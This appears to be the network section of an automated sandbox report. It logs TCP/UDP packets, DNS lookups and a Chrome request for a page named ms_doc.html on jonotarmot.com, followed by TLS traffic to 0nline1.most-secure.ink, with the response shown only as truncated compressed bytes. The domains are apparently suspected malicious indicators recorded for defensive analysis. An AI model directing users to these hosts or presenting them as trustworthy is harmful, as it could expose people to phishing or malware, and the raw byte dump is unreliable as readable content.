Dec 18, 2024 20:21:50.955143929 CET	80	49714	198.54.120.20	192.168.2.5
Dec 18, 2024 20:21:50.955210924 CET	49714	80	192.168.2.5	198.54.120.20
Dec 18, 2024 20:21:50.956032038 CET	80	49714	198.54.120.20	192.168.2.5
Dec 18, 2024 20:21:50.956142902 CET	80	49714	198.54.120.20	192.168.2.5
Dec 18, 2024 20:21:50.956265926 CET	49714	80	192.168.2.5	198.54.120.20
Dec 18, 2024 20:21:50.958134890 CET	80	49714	198.54.120.20	192.168.2.5
Dec 18, 2024 20:21:50.958276033 CET	80	49714	198.54.120.20	192.168.2.5
Dec 18, 2024 20:21:50.958631039 CET	49714	80	192.168.2.5	198.54.120.20
Dec 18, 2024 20:21:50.960186005 CET	80	49714	198.54.120.20	192.168.2.5
Dec 18, 2024 20:21:50.960268021 CET	80	49714	198.54.120.20	192.168.2.5
Dec 18, 2024 20:21:50.960623980 CET	49714	80	192.168.2.5	198.54.120.20
Dec 18, 2024 20:21:50.962182999 CET	80	49714	198.54.120.20	192.168.2.5
Dec 18, 2024 20:21:50.962292910 CET	80	49714	198.54.120.20	192.168.2.5
Dec 18, 2024 20:21:50.962428093 CET	49714	80	192.168.2.5	198.54.120.20
Dec 18, 2024 20:21:50.964220047 CET	80	49714	198.54.120.20	192.168.2.5
Dec 18, 2024 20:21:50.964354038 CET	80	49714	198.54.120.20	192.168.2.5
Dec 18, 2024 20:21:50.964521885 CET	49714	80	192.168.2.5	198.54.120.20
Dec 18, 2024 20:21:50.965765953 CET	80	49714	198.54.120.20	192.168.2.5
Dec 18, 2024 20:21:50.965945005 CET	80	49714	198.54.120.20	192.168.2.5
Dec 18, 2024 20:21:50.966046095 CET	49714	80	192.168.2.5	198.54.120.20
Dec 18, 2024 20:21:50.967262983 CET	80	49714	198.54.120.20	192.168.2.5
Dec 18, 2024 20:21:50.967433929 CET	80	49714	198.54.120.20	192.168.2.5
Dec 18, 2024 20:21:50.967475891 CET	49714	80	192.168.2.5	198.54.120.20
Dec 18, 2024 20:21:50.968759060 CET	80	49714	198.54.120.20	192.168.2.5
Dec 18, 2024 20:21:50.968911886 CET	80	49714	198.54.120.20	192.168.2.5
Dec 18, 2024 20:21:50.968960047 CET	49714	80	192.168.2.5	198.54.120.20
Dec 18, 2024 20:21:50.970640898 CET	80	49714	198.54.120.20	192.168.2.5
Dec 18, 2024 20:21:50.970685959 CET	80	49714	198.54.120.20	192.168.2.5
Dec 18, 2024 20:21:50.970732927 CET	49714	80	192.168.2.5	198.54.120.20
Dec 18, 2024 20:21:50.971765995 CET	80	49714	198.54.120.20	192.168.2.5
Dec 18, 2024 20:21:50.971853018 CET	80	49714	198.54.120.20	192.168.2.5
Dec 18, 2024 20:21:50.972448111 CET	49714	80	192.168.2.5	198.54.120.20
Dec 18, 2024 20:21:50.973150969 CET	80	49714	198.54.120.20	192.168.2.5
Dec 18, 2024 20:21:50.973249912 CET	80	49714	198.54.120.20	192.168.2.5
Dec 18, 2024 20:21:50.973303080 CET	49714	80	192.168.2.5	198.54.120.20
Dec 18, 2024 20:21:50.974625111 CET	80	49714	198.54.120.20	192.168.2.5
Dec 18, 2024 20:21:50.974714994 CET	80	49714	198.54.120.20	192.168.2.5
Dec 18, 2024 20:21:50.974967957 CET	49714	80	192.168.2.5	198.54.120.20
Dec 18, 2024 20:21:50.976087093 CET	80	49714	198.54.120.20	192.168.2.5
Dec 18, 2024 20:21:50.976233006 CET	80	49714	198.54.120.20	192.168.2.5
Dec 18, 2024 20:21:50.976275921 CET	49714	80	192.168.2.5	198.54.120.20
Dec 18, 2024 20:21:50.977592945 CET	80	49714	198.54.120.20	192.168.2.5
Dec 18, 2024 20:21:50.977735996 CET	80	49714	198.54.120.20	192.168.2.5
Dec 18, 2024 20:21:50.977785110 CET	49714	80	192.168.2.5	198.54.120.20
Dec 18, 2024 20:21:50.979039907 CET	80	49714	198.54.120.20	192.168.2.5
Dec 18, 2024 20:21:50.979120970 CET	80	49714	198.54.120.20	192.168.2.5
Dec 18, 2024 20:21:50.979190111 CET	49714	80	192.168.2.5	198.54.120.20
Dec 18, 2024 20:21:50.980505943 CET	80	49714	198.54.120.20	192.168.2.5
Dec 18, 2024 20:21:50.980607986 CET	80	49714	198.54.120.20	192.168.2.5
Dec 18, 2024 20:21:50.980855942 CET	49714	80	192.168.2.5	198.54.120.20
Dec 18, 2024 20:21:50.982007027 CET	80	49714	198.54.120.20	192.168.2.5
Dec 18, 2024 20:21:50.982101917 CET	80	49714	198.54.120.20	192.168.2.5
Dec 18, 2024 20:21:50.982192993 CET	49714	80	192.168.2.5	198.54.120.20
Dec 18, 2024 20:21:50.983509064 CET	80	49714	198.54.120.20	192.168.2.5
Dec 18, 2024 20:21:50.983604908 CET	80	49714	198.54.120.20	192.168.2.5
Dec 18, 2024 20:21:50.983652115 CET	49714	80	192.168.2.5	198.54.120.20
Dec 18, 2024 20:21:50.984920979 CET	80	49714	198.54.120.20	192.168.2.5
Dec 18, 2024 20:21:50.985007048 CET	80	49714	198.54.120.20	192.168.2.5
Dec 18, 2024 20:21:50.985375881 CET	49714	80	192.168.2.5	198.54.120.20
Dec 18, 2024 20:21:50.986443043 CET	80	49714	198.54.120.20	192.168.2.5
Dec 18, 2024 20:21:50.986567974 CET	80	49714	198.54.120.20	192.168.2.5
Dec 18, 2024 20:21:50.986901999 CET	49714	80	192.168.2.5	198.54.120.20
Dec 18, 2024 20:21:50.987966061 CET	80	49714	198.54.120.20	192.168.2.5
Dec 18, 2024 20:21:50.988107920 CET	80	49714	198.54.120.20	192.168.2.5
Dec 18, 2024 20:21:50.988142014 CET	49714	80	192.168.2.5	198.54.120.20
Dec 18, 2024 20:21:50.989547014 CET	80	49714	198.54.120.20	192.168.2.5
Dec 18, 2024 20:21:50.989633083 CET	80	49714	198.54.120.20	192.168.2.5
Dec 18, 2024 20:21:50.989701986 CET	49714	80	192.168.2.5	198.54.120.20
Dec 18, 2024 20:21:50.990993023 CET	80	49714	198.54.120.20	192.168.2.5
Dec 18, 2024 20:21:50.991091013 CET	80	49714	198.54.120.20	192.168.2.5
Dec 18, 2024 20:21:50.991444111 CET	49714	80	192.168.2.5	198.54.120.20
Dec 18, 2024 20:21:50.992321014 CET	80	49714	198.54.120.20	192.168.2.5
Dec 18, 2024 20:21:50.992412090 CET	80	49714	198.54.120.20	192.168.2.5
Dec 18, 2024 20:21:50.992626905 CET	49714	80	192.168.2.5	198.54.120.20
Dec 18, 2024 20:21:50.993822098 CET	80	49714	198.54.120.20	192.168.2.5
Dec 18, 2024 20:21:50.993956089 CET	80	49714	198.54.120.20	192.168.2.5
Dec 18, 2024 20:21:50.993994951 CET	49714	80	192.168.2.5	198.54.120.20
Dec 18, 2024 20:21:50.995337963 CET	80	49714	198.54.120.20	192.168.2.5
Dec 18, 2024 20:21:50.995392084 CET	80	49714	198.54.120.20	192.168.2.5
Dec 18, 2024 20:21:50.995605946 CET	49714	80	192.168.2.5	198.54.120.20
Dec 18, 2024 20:21:50.996762991 CET	80	49714	198.54.120.20	192.168.2.5
Dec 18, 2024 20:21:50.996917963 CET	80	49714	198.54.120.20	192.168.2.5
Dec 18, 2024 20:21:50.997118950 CET	49714	80	192.168.2.5	198.54.120.20
Dec 18, 2024 20:21:50.998217106 CET	80	49714	198.54.120.20	192.168.2.5
Dec 18, 2024 20:21:50.998321056 CET	80	49714	198.54.120.20	192.168.2.5
Dec 18, 2024 20:21:50.998375893 CET	49714	80	192.168.2.5	198.54.120.20
Dec 18, 2024 20:21:50.999658108 CET	80	49714	198.54.120.20	192.168.2.5
Dec 18, 2024 20:21:50.999821901 CET	80	49714	198.54.120.20	192.168.2.5
Dec 18, 2024 20:21:50.999862909 CET	49714	80	192.168.2.5	198.54.120.20
Dec 18, 2024 20:21:51.001141071 CET	80	49714	198.54.120.20	192.168.2.5
Dec 18, 2024 20:21:51.052758932 CET	49714	80	192.168.2.5	198.54.120.20
Dec 18, 2024 20:21:51.122288942 CET	49714	80	192.168.2.5	198.54.120.20
Dec 18, 2024 20:21:51.241832972 CET	80	49714	198.54.120.20	192.168.2.5
Dec 18, 2024 20:21:51.518786907 CET	80	49714	198.54.120.20	192.168.2.5
Dec 18, 2024 20:21:51.571909904 CET	49714	80	192.168.2.5	198.54.120.20
Dec 18, 2024 20:21:51.663146973 CET	49724	80	192.168.2.5	198.54.120.20
Dec 18, 2024 20:21:51.775938988 CET	49725	80	192.168.2.5	198.54.120.20
Dec 18, 2024 20:21:51.782737017 CET	80	49724	198.54.120.20	192.168.2.5
Dec 18, 2024 20:21:51.782855034 CET	49724	80	192.168.2.5	198.54.120.20
Dec 18, 2024 20:21:51.788273096 CET	49724	80	192.168.2.5	198.54.120.20
Dec 18, 2024 20:21:51.895572901 CET	80	49725	198.54.120.20	192.168.2.5
Dec 18, 2024 20:21:51.897959948 CET	49725	80	192.168.2.5	198.54.120.20
Dec 18, 2024 20:21:51.907815933 CET	80	49724	198.54.120.20	192.168.2.5
Dec 18, 2024 20:21:53.082314014 CET	80	49724	198.54.120.20	192.168.2.5
Dec 18, 2024 20:21:53.135739088 CET	49724	80	192.168.2.5	198.54.120.20
Dec 18, 2024 20:21:58.637623072 CET	443	49711	172.217.19.228	192.168.2.5
Dec 18, 2024 20:21:58.637686968 CET	443	49711	172.217.19.228	192.168.2.5
Dec 18, 2024 20:21:58.637746096 CET	49711	443	192.168.2.5	172.217.19.228
Dec 18, 2024 20:21:59.369714975 CET	49711	443	192.168.2.5	172.217.19.228
Dec 18, 2024 20:21:59.369744062 CET	443	49711	172.217.19.228	192.168.2.5
Dec 18, 2024 20:22:04.609601021 CET	49756	443	192.168.2.5	134.209.237.210
Dec 18, 2024 20:22:04.609635115 CET	443	49756	134.209.237.210	192.168.2.5
Dec 18, 2024 20:22:04.609829903 CET	49756	443	192.168.2.5	134.209.237.210
Dec 18, 2024 20:22:04.610083103 CET	49757	443	192.168.2.5	134.209.237.210
Dec 18, 2024 20:22:04.610120058 CET	443	49757	134.209.237.210	192.168.2.5
Dec 18, 2024 20:22:04.610240936 CET	49757	443	192.168.2.5	134.209.237.210
Dec 18, 2024 20:22:04.610311031 CET	49756	443	192.168.2.5	134.209.237.210
Dec 18, 2024 20:22:04.610327005 CET	443	49756	134.209.237.210	192.168.2.5
Dec 18, 2024 20:22:04.610460997 CET	49757	443	192.168.2.5	134.209.237.210
Dec 18, 2024 20:22:04.610472918 CET	443	49757	134.209.237.210	192.168.2.5
Dec 18, 2024 20:22:04.945925951 CET	80	49715	198.54.120.20	192.168.2.5
Dec 18, 2024 20:22:04.946135044 CET	80	49715	198.54.120.20	192.168.2.5
Dec 18, 2024 20:22:04.946216106 CET	49715	80	192.168.2.5	198.54.120.20
Dec 18, 2024 20:22:06.117774010 CET	443	49757	134.209.237.210	192.168.2.5
Dec 18, 2024 20:22:06.118803024 CET	49757	443	192.168.2.5	134.209.237.210
Dec 18, 2024 20:22:06.118813992 CET	443	49757	134.209.237.210	192.168.2.5
Dec 18, 2024 20:22:06.119821072 CET	443	49757	134.209.237.210	192.168.2.5
Dec 18, 2024 20:22:06.119888067 CET	49757	443	192.168.2.5	134.209.237.210
Dec 18, 2024 20:22:06.120804071 CET	49757	443	192.168.2.5	134.209.237.210
Dec 18, 2024 20:22:06.120867968 CET	443	49757	134.209.237.210	192.168.2.5
Dec 18, 2024 20:22:06.120970011 CET	49757	443	192.168.2.5	134.209.237.210
Dec 18, 2024 20:22:06.120980978 CET	443	49757	134.209.237.210	192.168.2.5
Dec 18, 2024 20:22:06.127152920 CET	443	49756	134.209.237.210	192.168.2.5
Dec 18, 2024 20:22:06.127371073 CET	49756	443	192.168.2.5	134.209.237.210
Dec 18, 2024 20:22:06.127384901 CET	443	49756	134.209.237.210	192.168.2.5
Dec 18, 2024 20:22:06.128448963 CET	443	49756	134.209.237.210	192.168.2.5
Dec 18, 2024 20:22:06.128536940 CET	49756	443	192.168.2.5	134.209.237.210
Dec 18, 2024 20:22:06.129715919 CET	49756	443	192.168.2.5	134.209.237.210
Dec 18, 2024 20:22:06.129781961 CET	443	49756	134.209.237.210	192.168.2.5
Dec 18, 2024 20:22:06.175858974 CET	49756	443	192.168.2.5	134.209.237.210
Dec 18, 2024 20:22:06.175868988 CET	443	49756	134.209.237.210	192.168.2.5
Dec 18, 2024 20:22:06.175898075 CET	49757	443	192.168.2.5	134.209.237.210
Dec 18, 2024 20:22:06.222302914 CET	49756	443	192.168.2.5	134.209.237.210
Dec 18, 2024 20:22:06.524662971 CET	80	49714	198.54.120.20	192.168.2.5
Dec 18, 2024 20:22:06.524760962 CET	49714	80	192.168.2.5	198.54.120.20
Dec 18, 2024 20:22:07.193738937 CET	443	49757	134.209.237.210	192.168.2.5
Dec 18, 2024 20:22:07.193763018 CET	443	49757	134.209.237.210	192.168.2.5
Dec 18, 2024 20:22:07.193772078 CET	443	49757	134.209.237.210	192.168.2.5
Dec 18, 2024 20:22:07.193795919 CET	443	49757	134.209.237.210	192.168.2.5
Dec 18, 2024 20:22:07.193804026 CET	443	49757	134.209.237.210	192.168.2.5
Dec 18, 2024 20:22:07.193816900 CET	443	49757	134.209.237.210	192.168.2.5
Dec 18, 2024 20:22:07.193824053 CET	49757	443	192.168.2.5	134.209.237.210
Dec 18, 2024 20:22:07.193835020 CET	443	49757	134.209.237.210	192.168.2.5
Dec 18, 2024 20:22:07.193861961 CET	49757	443	192.168.2.5	134.209.237.210
Dec 18, 2024 20:22:07.193892002 CET	49757	443	192.168.2.5	134.209.237.210
Dec 18, 2024 20:22:07.272300959 CET	49714	80	192.168.2.5	198.54.120.20
Dec 18, 2024 20:22:07.290024042 CET	443	49757	134.209.237.210	192.168.2.5
Dec 18, 2024 20:22:07.290072918 CET	443	49757	134.209.237.210	192.168.2.5
Dec 18, 2024 20:22:07.290132046 CET	49757	443	192.168.2.5	134.209.237.210
Dec 18, 2024 20:22:07.290139914 CET	443	49757	134.209.237.210	192.168.2.5
Dec 18, 2024 20:22:07.290179014 CET	49757	443	192.168.2.5	134.209.237.210
Dec 18, 2024 20:22:07.399045944 CET	80	49714	198.54.120.20	192.168.2.5
Dec 18, 2024 20:22:07.402021885 CET	443	49757	134.209.237.210	192.168.2.5
Dec 18, 2024 20:22:07.402043104 CET	443	49757	134.209.237.210	192.168.2.5
Dec 18, 2024 20:22:07.402147055 CET	49757	443	192.168.2.5	134.209.237.210
Dec 18, 2024 20:22:07.402156115 CET	443	49757	134.209.237.210	192.168.2.5
Dec 18, 2024 20:22:07.402213097 CET	49757	443	192.168.2.5	134.209.237.210
Dec 18, 2024 20:22:07.508894920 CET	443	49757	134.209.237.210	192.168.2.5
Dec 18, 2024 20:22:07.508927107 CET	443	49757	134.209.237.210	192.168.2.5
Dec 18, 2024 20:22:07.509027958 CET	49757	443	192.168.2.5	134.209.237.210
Dec 18, 2024 20:22:07.509056091 CET	443	49757	134.209.237.210	192.168.2.5
Dec 18, 2024 20:22:07.509095907 CET	49757	443	192.168.2.5	134.209.237.210
Dec 18, 2024 20:22:07.549693108 CET	443	49757	134.209.237.210	192.168.2.5
Dec 18, 2024 20:22:07.549719095 CET	443	49757	134.209.237.210	192.168.2.5
Dec 18, 2024 20:22:07.549822092 CET	49757	443	192.168.2.5	134.209.237.210
Dec 18, 2024 20:22:07.549833059 CET	443	49757	134.209.237.210	192.168.2.5
Dec 18, 2024 20:22:07.549892902 CET	49757	443	192.168.2.5	134.209.237.210
Dec 18, 2024 20:22:07.590766907 CET	443	49757	134.209.237.210	192.168.2.5
Dec 18, 2024 20:22:07.590795994 CET	443	49757	134.209.237.210	192.168.2.5
Dec 18, 2024 20:22:07.590934038 CET	49757	443	192.168.2.5	134.209.237.210
Dec 18, 2024 20:22:07.590956926 CET	443	49757	134.209.237.210	192.168.2.5
Dec 18, 2024 20:22:07.591000080 CET	49757	443	192.168.2.5	134.209.237.210
Dec 18, 2024 20:22:07.637320042 CET	443	49757	134.209.237.210	192.168.2.5
Dec 18, 2024 20:22:07.637345076 CET	443	49757	134.209.237.210	192.168.2.5
Dec 18, 2024 20:22:07.637404919 CET	49757	443	192.168.2.5	134.209.237.210
Dec 18, 2024 20:22:07.637418985 CET	443	49757	134.209.237.210	192.168.2.5
Dec 18, 2024 20:22:07.637466908 CET	49757	443	192.168.2.5	134.209.237.210
Dec 18, 2024 20:22:07.670284986 CET	443	49757	134.209.237.210	192.168.2.5
Dec 18, 2024 20:22:07.670315981 CET	443	49757	134.209.237.210	192.168.2.5
Dec 18, 2024 20:22:07.670387030 CET	49757	443	192.168.2.5	134.209.237.210
Dec 18, 2024 20:22:07.670403957 CET	443	49757	134.209.237.210	192.168.2.5
Dec 18, 2024 20:22:07.670428038 CET	49757	443	192.168.2.5	134.209.237.210
Dec 18, 2024 20:22:07.670460939 CET	49757	443	192.168.2.5	134.209.237.210
Dec 18, 2024 20:22:07.696332932 CET	443	49757	134.209.237.210	192.168.2.5
Dec 18, 2024 20:22:07.696356058 CET	443	49757	134.209.237.210	192.168.2.5
Dec 18, 2024 20:22:07.696468115 CET	49757	443	192.168.2.5	134.209.237.210
Dec 18, 2024 20:22:07.696499109 CET	443	49757	134.209.237.210	192.168.2.5
Dec 18, 2024 20:22:07.696538925 CET	49757	443	192.168.2.5	134.209.237.210
Dec 18, 2024 20:22:07.696580887 CET	443	49757	134.209.237.210	192.168.2.5
Dec 18, 2024 20:22:07.696669102 CET	443	49757	134.209.237.210	192.168.2.5
Dec 18, 2024 20:22:07.696705103 CET	49757	443	192.168.2.5	134.209.237.210
Dec 18, 2024 20:22:07.735321045 CET	49757	443	192.168.2.5	134.209.237.210
Dec 18, 2024 20:22:07.738497019 CET	49757	443	192.168.2.5	134.209.237.210
Dec 18, 2024 20:22:07.738527060 CET	443	49757	134.209.237.210	192.168.2.5
Dec 18, 2024 20:22:07.957920074 CET	80	49725	198.54.120.20	192.168.2.5
Dec 18, 2024 20:22:07.958058119 CET	80	49725	198.54.120.20	192.168.2.5
Dec 18, 2024 20:22:07.958112955 CET	49725	80	192.168.2.5	198.54.120.20
Dec 18, 2024 20:22:08.082319021 CET	80	49724	198.54.120.20	192.168.2.5
Dec 18, 2024 20:22:08.082405090 CET	49724	80	192.168.2.5	198.54.120.20
Dec 18, 2024 20:22:09.291470051 CET	49724	80	192.168.2.5	198.54.120.20
Dec 18, 2024 20:22:09.411865950 CET	80	49724	198.54.120.20	192.168.2.5
Dec 18, 2024 20:22:47.103632927 CET	49852	443	192.168.2.5	172.217.19.228
Dec 18, 2024 20:22:47.103683949 CET	443	49852	172.217.19.228	192.168.2.5
Dec 18, 2024 20:22:47.103801966 CET	49852	443	192.168.2.5	172.217.19.228
Dec 18, 2024 20:22:47.104096889 CET	49852	443	192.168.2.5	172.217.19.228
Dec 18, 2024 20:22:47.104113102 CET	443	49852	172.217.19.228	192.168.2.5
Dec 18, 2024 20:22:49.087351084 CET	443	49852	172.217.19.228	192.168.2.5
Dec 18, 2024 20:22:49.087781906 CET	49852	443	192.168.2.5	172.217.19.228
Dec 18, 2024 20:22:49.087802887 CET	443	49852	172.217.19.228	192.168.2.5
Dec 18, 2024 20:22:49.088143110 CET	443	49852	172.217.19.228	192.168.2.5
Dec 18, 2024 20:22:49.088484049 CET	49852	443	192.168.2.5	172.217.19.228
Dec 18, 2024 20:22:49.088546038 CET	443	49852	172.217.19.228	192.168.2.5
Dec 18, 2024 20:22:49.133603096 CET	49852	443	192.168.2.5	172.217.19.228
Dec 18, 2024 20:22:49.369307995 CET	49715	80	192.168.2.5	198.54.120.20
Dec 18, 2024 20:22:49.370070934 CET	49715	80	192.168.2.5	198.54.120.20
Dec 18, 2024 20:22:49.489092112 CET	80	49715	198.54.120.20	192.168.2.5
Dec 18, 2024 20:22:49.489315033 CET	49715	80	192.168.2.5	198.54.120.20
Dec 18, 2024 20:22:51.179939032 CET	49756	443	192.168.2.5	134.209.237.210
Dec 18, 2024 20:22:51.179958105 CET	443	49756	134.209.237.210	192.168.2.5
Dec 18, 2024 20:22:52.961270094 CET	49725	80	192.168.2.5	198.54.120.20
Dec 18, 2024 20:22:53.081214905 CET	80	49725	198.54.120.20	192.168.2.5
Dec 18, 2024 20:22:53.369211912 CET	49725	80	192.168.2.5	198.54.120.20
Dec 18, 2024 20:22:53.369244099 CET	49725	80	192.168.2.5	198.54.120.20
Dec 18, 2024 20:22:53.492429972 CET	80	49725	198.54.120.20	192.168.2.5
Dec 18, 2024 20:22:53.492530107 CET	49725	80	192.168.2.5	198.54.120.20
Dec 18, 2024 20:22:58.741275072 CET	443	49852	172.217.19.228	192.168.2.5
Dec 18, 2024 20:22:58.741338968 CET	443	49852	172.217.19.228	192.168.2.5
Dec 18, 2024 20:22:58.741452932 CET	49852	443	192.168.2.5	172.217.19.228
Dec 18, 2024 20:22:59.369350910 CET	49852	443	192.168.2.5	172.217.19.228
Dec 18, 2024 20:22:59.369376898 CET	443	49852	172.217.19.228	192.168.2.5
Dec 18, 2024 20:23:05.928344965 CET	443	49756	134.209.237.210	192.168.2.5
Dec 18, 2024 20:23:05.928527117 CET	443	49756	134.209.237.210	192.168.2.5
Dec 18, 2024 20:23:05.928852081 CET	49756	443	192.168.2.5	134.209.237.210
Dec 18, 2024 20:23:07.369060040 CET	49756	443	192.168.2.5	134.209.237.210
Dec 18, 2024 20:23:07.369090080 CET	443	49756	134.209.237.210	192.168.2.5

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 18, 2024 20:21:43.276854038 CET	53	62988	1.1.1.1	192.168.2.5
Dec 18, 2024 20:21:43.277803898 CET	53	57043	1.1.1.1	192.168.2.5
Dec 18, 2024 20:21:45.983675003 CET	53	60882	1.1.1.1	192.168.2.5
Dec 18, 2024 20:21:47.040998936 CET	62680	53	192.168.2.5	1.1.1.1
Dec 18, 2024 20:21:47.040999889 CET	54090	53	192.168.2.5	1.1.1.1
Dec 18, 2024 20:21:47.180716038 CET	53	62680	1.1.1.1	192.168.2.5
Dec 18, 2024 20:21:47.181312084 CET	53	54090	1.1.1.1	192.168.2.5
Dec 18, 2024 20:21:48.121295929 CET	58543	53	192.168.2.5	1.1.1.1
Dec 18, 2024 20:21:48.121615887 CET	55890	53	192.168.2.5	1.1.1.1
Dec 18, 2024 20:21:48.771826982 CET	53	55890	1.1.1.1	192.168.2.5
Dec 18, 2024 20:21:48.772842884 CET	53	58543	1.1.1.1	192.168.2.5
Dec 18, 2024 20:21:51.198498011 CET	53	53498	1.1.1.1	192.168.2.5
Dec 18, 2024 20:21:51.522279978 CET	50145	53	192.168.2.5	1.1.1.1
Dec 18, 2024 20:21:51.522427082 CET	52895	53	192.168.2.5	1.1.1.1
Dec 18, 2024 20:21:51.661406040 CET	53	50145	1.1.1.1	192.168.2.5
Dec 18, 2024 20:21:51.662727118 CET	53	52895	1.1.1.1	192.168.2.5
Dec 18, 2024 20:22:02.914721966 CET	53	56398	1.1.1.1	192.168.2.5
Dec 18, 2024 20:22:04.039268970 CET	60448	53	192.168.2.5	1.1.1.1
Dec 18, 2024 20:22:04.039422035 CET	53286	53	192.168.2.5	1.1.1.1
Dec 18, 2024 20:22:04.608685017 CET	53	53286	1.1.1.1	192.168.2.5
Dec 18, 2024 20:22:04.608702898 CET	53	60448	1.1.1.1	192.168.2.5
Dec 18, 2024 20:22:21.802069902 CET	53	53841	1.1.1.1	192.168.2.5
Dec 18, 2024 20:22:42.821259975 CET	53	55249	1.1.1.1	192.168.2.5
Dec 18, 2024 20:22:44.757405043 CET	53	54369	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 18, 2024 20:21:47.040998936 CET	192.168.2.5	1.1.1.1	0xb8e6	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Dec 18, 2024 20:21:47.040999889 CET	192.168.2.5	1.1.1.1	0x36be	Standard query (0)	www.google.com	65	IN (0x0001)	false
Dec 18, 2024 20:21:48.121295929 CET	192.168.2.5	1.1.1.1	0x1939	Standard query (0)	jonotarmot.com	A (IP address)	IN (0x0001)	false
Dec 18, 2024 20:21:48.121615887 CET	192.168.2.5	1.1.1.1	0x31cb	Standard query (0)	jonotarmot.com	65	IN (0x0001)	false
Dec 18, 2024 20:21:51.522279978 CET	192.168.2.5	1.1.1.1	0xcbc7	Standard query (0)	jonotarmot.com	A (IP address)	IN (0x0001)	false
Dec 18, 2024 20:21:51.522427082 CET	192.168.2.5	1.1.1.1	0x124d	Standard query (0)	jonotarmot.com	65	IN (0x0001)	false
Dec 18, 2024 20:22:04.039268970 CET	192.168.2.5	1.1.1.1	0xf698	Standard query (0)	0nline1.most-secure.ink	A (IP address)	IN (0x0001)	false
Dec 18, 2024 20:22:04.039422035 CET	192.168.2.5	1.1.1.1	0x4b49	Standard query (0)	0nline1.most-secure.ink	65	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 18, 2024 20:21:47.180716038 CET	1.1.1.1	192.168.2.5	0xb8e6	No error (0)	www.google.com		172.217.19.228	A (IP address)	IN (0x0001)	false
Dec 18, 2024 20:21:47.181312084 CET	1.1.1.1	192.168.2.5	0x36be	No error (0)	www.google.com			65	IN (0x0001)	false
Dec 18, 2024 20:21:48.772842884 CET	1.1.1.1	192.168.2.5	0x1939	No error (0)	jonotarmot.com		198.54.120.20	A (IP address)	IN (0x0001)	false
Dec 18, 2024 20:21:51.661406040 CET	1.1.1.1	192.168.2.5	0xcbc7	No error (0)	jonotarmot.com		198.54.120.20	A (IP address)	IN (0x0001)	false
Dec 18, 2024 20:22:04.608702898 CET	1.1.1.1	192.168.2.5	0xf698	No error (0)	0nline1.most-secure.ink		134.209.237.210	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

jonotarmot.com

0nline1.most-secure.ink

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49714	198.54.120.20	80	4456	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
Dec 18, 2024 20:21:48.898153067 CET	444	OUT	GET /dcs/ms_doc.html HTTP/1.1 Host: jonotarmot.com Connection: keep-alive Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9
Dec 18, 2024 20:21:50.184212923 CET	1236	IN	HTTP/1.1 200 OK date: Wed, 18 Dec 2024 19:21:49 GMT server: Apache last-modified: Fri, 13 Dec 2024 19:27:16 GMT accept-ranges: bytes vary: Accept-Encoding content-encoding: gzip transfer-encoding: chunked content-type: text/html Data Raw: 46 44 30 41 0d 0a 1f 8b 08 00 00 00 00 00 00 03 74 bd 57 b3 ab 6c 9b a0 77 ee 2a ff 87 d7 9f 0f 3c 36 fd 9a 2c a0 a7 7b aa c8 39 27 c1 19 39 07 91 c1 7f de ec cf e3 99 9a ae 1a ad da 4b 4b 48 02 1e b8 c3 75 21 d0 fe b7 ff 8d 33 59 2f b2 f8 bf ea 6d e8 ff cb ff fa bf fc db 9f fb bf fa 64 ac fe fd 1f c5 f8 8f 7f 4e 29 92 fc bd ff eb bd fd db 50 6c c9 5f 59 9d 2c 6b b1 fd fb 3f 7c 4f f8 9b fc c7 ff f0 dc 98 0c c5 bf ff e3 68 8a 73 9e 96 ed 1f 7f 65 d3 b8 15 e3 fb da b3 c9 b7 fa df f3 e2 68 b2 e2 ef 7f 3e f8 97 bf 9a b1 d9 9a a4 ff 7b cd 92 be f8 77 f8 ff 86 fe db bc b6 66 eb 8b ff f2 7f bd b7 bf ff fe fb fd fd 6f e0 ff 37 e5 bf 3e bd 6e f7 7f 7b f0 e7 96 4e f9 fd d7 ff f3 df 1f ff b9 95 ef 92 ff 2e 93 a1 e9 ef 7f fd eb 1f 6e 51 4d c5 5f be fc 8f 7f f9 ef 7f ff 15 16 e9 5f ff 29 2c d6 ed 2f 7e 5f a6 b9 48 c6 ff f3 7d fe ef 64 9e fb e2 ef f5 5e b7 62 f8 97 bf 98 be 19 3b 3d c9 dc 7f 3e 16 de b9 fe cb 5f ce 94 4e db f4 ce 4a 2a fa a3 d8 9a 2c f9 cb 28 f6 e2 7d f3 9a 8c eb df 6b b1 34 e5 7f fe 1f 57 27 4d [TRUNCATED] Data Ascii: FD0AtWlw<6,{9'9KKHu!3Y/mdN)Pl_Y,k?\|Ohseh>{wfo7>n{N.nQM__),/~_H}d^b;=>_NJ,(}k4W'MZ}~ZR5y}?<uc_XwuTv?<45CR-Ni_1Rj5W44kKG=T4v`\rTr#A=5Ndb1*)I<cN\|:pX xMz4T-u`f@_ @?!hF{'qAODFE@E z ^X"~@hYA}2H1](j.3T^Q/5;O{4CSn7xD(`P)(K><1s}?auS!)-`eS#jL,"`fdR6g",5_m5U1R1W"q-gG =Pd,Nt"j= SWe[qG2iN^9,x\|!NR3!L$4,Q5Dc]T+Y$Rx3
